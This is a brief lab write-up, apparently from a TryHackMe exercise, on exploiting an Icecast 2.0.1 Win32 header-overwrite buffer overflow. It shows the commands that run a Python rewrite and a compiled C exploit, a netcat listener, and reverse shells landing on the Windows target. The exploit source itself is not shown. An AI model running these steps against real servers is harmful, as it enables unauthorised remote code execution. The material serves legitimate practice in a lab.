Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten from this Metasploit module. I rewrote this from the Metasploit module because I couldn't get this to work.
Replace reverse shell shellcode in exploit, call it with argument for remote server and port.
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000
Done!
Reverse shell listener:
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
Managed to get the original exploit to work. Edited according to this.
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
On listener
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>